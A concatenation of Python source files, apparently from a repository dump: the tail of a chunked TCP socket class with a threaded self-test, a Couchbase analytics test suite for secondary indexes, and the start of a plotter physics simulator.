msg_bytes = msg_bytes[:length]
if self.log_n_bytes != 0:
self.logger.debug('<-- %s', msg_bytes[:self.log_n_bytes])
return msg_bytes
def recv_to_separator(self, separator: bytes):
"""Receive bytes until the given separator is found.
This function handles chunked data (i.e. the data to receive is
split into multiple packets). If more data than expected is
received, it is placed into a backlog buffer until the next call
to a receive function.
:Parameters:
separator -- One or more bytes that separate messages in the TCP
stream.
:Return:
The received bytes.
:Raises:
RuntimeError
TimeoutError
"""
self.logger.debug('recv_to_separator(%s)', separator)
start_search_index = 0
chunk = b''
msg_bytes = b''
while True:
if self._backlog_bytes is not None and len(self._backlog_bytes) > 0:
# The first time around, process the backlog.
chunk = self._backlog_bytes
self._backlog_bytes = None
if self.debug:
self.logger.debug('backlog chunk = %s', chunk)
else:
chunk = self.sock.recv(4096)
if self.debug:
self.logger.debug('socket.recv(4096) := %s', chunk)
if chunk == b'':
raise RuntimeError("socket connection broken")
msg_bytes = msg_bytes + chunk
start_separator_index = msg_bytes.find(separator, start_search_index)
if start_separator_index > -1:
# We found the separator at index start_separator_index.
self._backlog_bytes = msg_bytes[start_separator_index + len(separator):]
if self.debug:
self.logger.debug('Backlog: %u bytes', self._backlog_bytes)
msg_bytes = msg_bytes[:start_separator_index]
break
# The separator could have started in the current chunk but
# finishes in the next chunk, so we need to search the
# len(separator) - 1 last bytes of the separator again
start_search_index = max(0, len(msg_bytes) - (len(separator) - 1))
if self.log_n_bytes != 0:
self.logger.debug('<-- %s', msg_bytes[:self.log_n_bytes])
return msg_bytes
if __name__ == '__main__':
import sys
from threading import Barrier, BrokenBarrierError, Thread
from time import sleep
start_barrier = Barrier(2, timeout=5)
end_barrier = Barrier(3, timeout=60)
MSG_SEP = b'\0\1\2\1\0'
messages = [
b'abcdef',
b'1234',
b'a', b'bc', b'de\0', b'\1\2\1\0fghi',
b'xyzZYX',
b'',
b'+++',
]
def server():
"""Test server."""
logger = logging.getLogger('server')
logger.info('server starting')
server_socket = ChunkyStreamSocket(logger=logging.getLogger('server.socket'))
server_socket.bind_and_listen(timeout=60)
logger.debug('server_socket = %s', server_socket.sock)
start_barrier.wait()
logger.info('server running')
(accepted_socket, client_addr) = server_socket.accept()
logger.debug('Accepted client from %s:%u', client_addr[0], client_addr[1])
cs = ChunkyStreamSocket(sock=accepted_socket,
logger=logging.getLogger('server.cs'))
while True:
msg = cs.recv_to_separator(MSG_SEP)
logger.info('MSG: %s', msg)
if msg == b'+++':
logger.debug('EOF received')
break
logger.info('server closing connection')
cs.close()
server_socket.close()
try:
end_barrier.wait()
except BrokenBarrierError:
logger.error('server() end_barrier broken')
def client():
"""Test client."""
logger = logging.getLogger('client')
logger.info('client starting')
client_socket = ChunkyStreamSocket(logger=logging.getLogger('client.socket'))
logger.debug('client_socket = %s', client_socket.sock)
start_barrier.wait()
logger.info('client running')
client_socket.connect()
for message in messages:
try:
client_socket.send(message + MSG_SEP)
except RuntimeError as e:
logger.critical('send(%u) failed: %s', len(message + MSG_SEP), e)
logger.critical('client terminating')
break
try:
end_barrier.wait()
except BrokenBarrierError:
logger.error('client() end_barrier broken')
finally:
client_socket.close()
# Log everything to the console.
main_logger = logging.getLogger()
main_logger.setLevel(logging.NOTSET)
ch = logging.StreamHandler()
ch.setLevel(logging.NOTSET)
formatter = logging.Formatter('%(asctime)s - %(name)20s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
main_logger.addHandler(ch)
server_thread = Thread(target=server, args=())
client_thread = Thread(target=client, args=())
server_thread.start()
sleep(1.0) # give the server time to set up before starting client.
client_thread.start()
main_logger.info('Client and server running.')
try:
end_barrier.wait(timeout=5)
except BrokenBarrierError:
main_logger.error('Barrier broken. Terminating')
sys.exit(0)
|
cbas_secondary_indexes.py
|
import threading
import random
from TestInput import TestInputSingleton
from cbas.cbas_base import CBASBaseTest
class CBASSecondaryIndexes(CBASBaseTest):
def setUp(self):
self.input = TestInputSingleton.input
if "default_bucket" not in self.input.test_params:
self.input.test_params.update({"default_bucket": False})
super(CBASSecondaryIndexes, self).setUp()
self.load_sample_buckets(servers=[self.cluster.master],
bucketName=self.cb_bucket_name,
total_items=self.beer_sample_docs_count)
if "add_all_cbas_nodes" in self.input.test_params and \
self.input.test_params["add_all_cbas_nodes"] and len(
self.cluster.cbas_nodes) > 1:
self.cluster_util.add_all_nodes_then_rebalance(
self.cluster, self.cluster.cbas_nodes)
self.cbas_util.createConn(self.cb_bucket_name)
# Create dataset on the CBAS bucket
self.cbas_util.create_dataset_on_bucket(
cbas_bucket_name=self.cb_bucket_name,
cbas_dataset_name=self.cbas_dataset_name,
compress_dataset=self.compress_dataset)
def tearDown(self):
super(CBASSecondaryIndexes, self).tearDown()
def verify_index_used(self, statement, index_used=False, index_name=None):
statement = 'EXPLAIN %s'%statement
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
if status == 'success':
self.assertEquals(errors, None)
if index_used:
self.assertTrue("index-search" in str(results))
self.assertFalse("data-scan" in str(results))
self.log.info("INDEX-SEARCH is found in EXPLAIN hence indexed data will be scanned to serve %s"%statement)
if index_name:
self.assertTrue(index_name in str(results))
else:
self.assertTrue("data-scan" in str(results))
self.assertFalse("index-search" in str(results))
self.log.info("DATA-SCAN is found in EXPLAIN hence index is not used to serve %s"%statement)
def test_create_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index on various fields as passed in the parameters
3. Validate if the index is created and the index definition has the expected fields
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_without_if_not_exists(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name without using IF_NOT_EXISTS clause
3. Validate if the error msg is as expected
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Create another index with same name
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error),
"Error msg not matching expected error msg")
def test_create_index_with_if_not_exists(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name using IF_NOT_EXISTS clause
3. Validate if that there is no error
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Create another index with same name
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_with_if_not_exists_different_fields(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name but with different fields using IF_NOT_EXISTS clause
4. Validate there is no error
5. The index definition of should not change.
Author : Mihir Kamdar
Created date : 8/1/2017
'''
index_field1 = "city:string"
index_field2 = "abv:bigint"
# Create Index
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_field1)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, [index_field1],
self.cbas_dataset_name)[0])
# Create another index with same name
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_field2)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
# The index definition should be based on the older field, it should not change
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, [index_field1],
self.cbas_dataset_name)[0])
def test_multiple_composite_index_with_overlapping_fields(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create a composite index
4. Now create another composite index with some overlapping fields
5. Both the indexes should get created successfully
Author : Mihir Kamdar
Created date : 8/1/2017
'''
index_fields1 = ["city:string", "abv:bigint"]
index_fields2 = ["abv:bigint", "geo.lat:double"]
# Create Index
index_fields = ""
for index_field in index_fields1:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name + "1", self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name + "1", index_fields1,
self.cbas_dataset_name)[0])
# Create another composite index with overlapping fields
index_fields = ""
for index_field in index_fields2:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name + "2", self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name + "2", index_fields2,
self.cbas_dataset_name)[0])
statement = 'SELECT VALUE v FROM '+ self.cbas_dataset_name + ' v WHERE v.geo.lat > 1 AND v.abv > 2'
self.verify_index_used(statement, True, self.index_name)
def test_create_index_non_empty_dataset(self):
'''
Steps :
1. Create bucket in CBAS, create dataset, connect to the bucket, disconnect from bucket
2. Create index
3. Validate the index is created correctly
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Connect to Bucket
result = self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Disconnect from bucket
result = self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_with_bucket_connected(self):
'''
Steps :
1. Create bucket in CBAS, create dataset, connect to the bucket
2. Create index
3. Create index should fail.
4. Validate that the error msg is as expected
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Connect to Bucket
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error))
def test_drop_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Drop index
5. Validate that the index is dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(status == "success", "Drop Index query failed")
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_drop_non_existing_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Drop a non-existing index without using IF_EXISTS clause
3. Validate that the error msg is as expected
4. Drop a non-existing index using IF_EXISTS clause
5. Validate there is no error
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Drop non-existing index without IF EXISTS
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error))
# Drop non-existing index with IF EXISTS
drop_idx_statement = "drop index {0}.{1} IF EXISTS;".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertEqual(status, "success",
"Drop non existent index with IF EXISTS fails")
def test_drop_dataset_drops_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Drop dataset
5. Validate that the index is also dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Drop dataset
self.cbas_util.drop_dataset(self.cbas_dataset_name)
# Check that the index no longer exists
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_drop_non_empty_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Connect dataset, disconnect dataset
5. Drop index
6. Validate that the index is dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Connect to Bucket
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(status == "success", "Drop Index query failed")
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name,
self.index_fields,
self.cbas_dataset_name)[0])
def _direct_client(self, server, bucket, timeout=30):
# CREATE SDK CLIENT
if self.sdk_client_type == "java":
try:
from sdk_client3 import SDKClient
scheme = "couchbase"
host = self.cluster.master.ip
if self.cluster.master.ip == "127.0.0.1":
scheme = "http"
host = "{0}:{1}".format(self.cluster.master.ip, self.cluster.master.port)
return SDKClient(scheme=scheme, hosts=[host], bucket=bucket,
password=self.cluster.master.rest_password)
except Exception, ex:
self.log.error("cannot load sdk client due to error {0}"
.format(str(ex)))
# USE MC BIN CLIENT WHEN NOT USING SDK CLIENT
return self.direct_mc_bin_client(server, bucket, timeout=timeout)
def test_index_population(self):
'''
Steps :
1.
'''
# Create Index
# to_verify=0
search_by = self.input.param("search_by", '')
exp_number = self.input.param("exp_number", 0)
not_fit_value = self.input.param("not_fit_value", '')
expected_status = self.input.param("status", 'success')
binary = self.input.param("binary", False)
index_used = self.input.param("index_used", False)
if ";" in str(not_fit_value):
not_fit_value = not_fit_value.split(';')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
self.client = self._direct_client(self.cluster.master, self.cb_bucket_name)
k = 'test_index_population'
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
if binary:
self.client.upsert('utf16_doc', not_fit_value.encode('utf16'))
else:
if "." in index_fields.split(":")[0]:
self.client.upsert(k, {index_fields.split(":")[0].split(".")[0]:{index_fields.split(":")[0].split(".")[1] : not_fit_value}})
else:
self.client.upsert(k, {index_fields.split(":")[0] : not_fit_value})
self.client.close()
if index_fields.split(":")[1] == "string" and isinstance(not_fit_value,str) or \
index_fields.split(":")[1] == "double" and isinstance(not_fit_value,(float,int)) or \
index_fields.split(":")[1] == "bigint" and isinstance(not_fit_value,(float,int)):
index_used=True
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
if isinstance(search_by, basestring):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name, index_fields.split(":")[0], search_by)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
if isinstance(not_fit_value,str):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, expected_status)
if status == 'success':
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 1}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
# https://issues.couchbase.com/browse/MB-25646
# https://issues.couchbase.com/browse/MB-25657
def test_index_population_thread(self):
to_verify = 0
index_used = self.input.param("index_used", False)
def update_data(client, index_fields):
for _ in xrange(100):
if index_fields.split(":")[-1] == 'double':
not_fit_value = random.choice([False, "sdfs", 11111])
elif index_fields.split(":")[-1] == 'string':
not_fit_value = random.choice([False, 11111, 36.6])
elif index_fields.split(":")[-1] == 'bigint':
not_fit_value = random.choice([False, "sdfs", 36.6])
perc = random.randrange(0, 100)
if perc > 75:
# 25% with binary data
# client.upsert('utf16_doc', str(not_fit_value).encode('utf16'), format=FMT_BYTES)
client.upsert(k, {index_fields.split(":")[0]: not_fit_value})
else:
# 10% field removed
client.upsert(k, {index_fields.split(":")[0] + "_NEW_FIELD": not_fit_value})
# Create Index
search_by = self.input.param("search_by", '')
exp_number = self.input.param("exp_number", 0)
not_fit_value = self.input.param("not_fit_value", '')
expected_status = self.input.param("status", 'success')
if ";" in not_fit_value:
not_fit_value = not_fit_value.split(';')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
self.client = self._direct_client(self.cluster.master, self.cb_bucket_name)
k = 'test_index_population_thread'
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(10)
d = threading.Thread(name='daemon', target=update_data, args=(self.client, index_fields,))
d.setDaemon(True)
d.start()
for i in xrange(10):
if isinstance(search_by, basestring):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
if isinstance(not_fit_value,str):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, expected_status)
if status == 'success':
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 0}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
self.client.close()
def test_index_population_where_statements(self):
exp_number = self.input.param("exp_number", 0)
where_statement = self.input.param("where_statement", '').replace('_EQ_', '=')
index_used = self.input.param("index_used", False)
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
statement = 'SELECT count(*) FROM `{0}` where {1};'.format(self.cbas_dataset_name, where_statement)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
def test_index_population_joins(self):
exp_number = self.input.param("exp_number", 0)
self.index_name2 = self.input.param('index_name2', None)
self.index_fields2 = self.input.param('index_fields2', None)
if self.index_fields2:
self.index_fields2 = self.index_fields2.split("-")
statement = self.input.param("statement", '').replace('_EQ_', '=').replace('_COMMA_', ',')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
index_fields2 = ""
for index_field in self.index_fields2:
index_fields2 += index_field + ","
index_fields2 = index_fields2[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name2, self.cbas_dataset_name, index_fields2)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name2, self.index_fields2,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(len(results), exp_number)
# https://issues.couchbase.com/browse/MB-25695
def test_index_metadata(self):
self.buckets = [Bucket(name="beer-sample")]
self.perform_doc_ops_in_all_cb_buckets("create", start_key=0, end_key=100000)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.cbas_util.wait_for_ingestion_complete([self.cbas_dataset_name], 107303)
statement = 'SELECT count(*) FROM `{0}`'.format(self.cbas_dataset_name)
#
_, result = self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)
self.assertEquals(result[0]['Index']['DatasetName'], self.cbas_dataset_name)
self.assertEquals(result[0]['Index']['DataverseName'], 'Default')
self.assertEquals(result[0]['Index']['IndexName'], self.index_name)
self.assertEquals(result[0]['Index']['IndexStructure'], 'BTREE')
self.assertEquals(result[0]['Index']['IsPrimary'], False)
self.assertEquals(result[0]['Index']['PendingOp'], 0)
self.assertEquals(result[0]['Index']['SearchKey'], [index_field.split(":")[:-1]])
self.assertEquals(result[0]['Index']['SearchKeyType'], index_field.split(":")[1:])
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 107303}])
self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
drop_idx_statement = "drop index {0}.{1};".format(self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
_, result = self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)
self.assertEquals(result, [])
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 107303}])
def test_index_on_nested_fields_same_object(self):
index_fields = ["geo.lon:double", "geo.lat:double"]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(self.index_name, self.cbas_dataset_name, ",".join(index_fields))
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(self.cbas_util.verify_index_created(self.index_name, index_fields, self.cbas_dataset_name)[0])
statement = 'SELECT VALUE v FROM '+ self.cbas_dataset_name + ' v WHERE v.geo.lon > 1 AND v.geo.lat > 2'
self.verify_index_used(statement, True, self.index_name)
|
plotter_simulator.py
|
import plotter_controller
import threading
import random
import time
import PIL.Image
import PIL.ImageDraw
import numpy as np
import sys
import step_file_data_provider
import math
class PlotterSimulator:
def __init__(self, step_time, phys_time, image_output_dir=None, save_stats=True):
self.image_time_step = 1 / 60
self.image_size = (600,600)
self.image_scale = 100
self.image_center_offset = (0,0)
self.image_output_dir = image_output_dir
self.drawn_image = None
self.step_time = step_time
self.phys_time = phys_time
#some physics constants
self.x_mass = 1
self.y_mass = 1
self.step_size = 0.001
self.k_x = 600 #The spring stiffness
self.k_y = 600 #The spring stiffness
self.c_x = 20
self.c_y = 20
self.save_stats = save_stats
self.stats = {}
self.clearStats()
#actual state of the object
self.state = []
self.effector_pos = (0,0)
self.effector_velocity = (0,0)
self.logical_pos = (0,0)
self.current_time = 0
self.current_phys_time = 0
self.step_count = 0
self.current_image_time = 0
self.image_count = 0
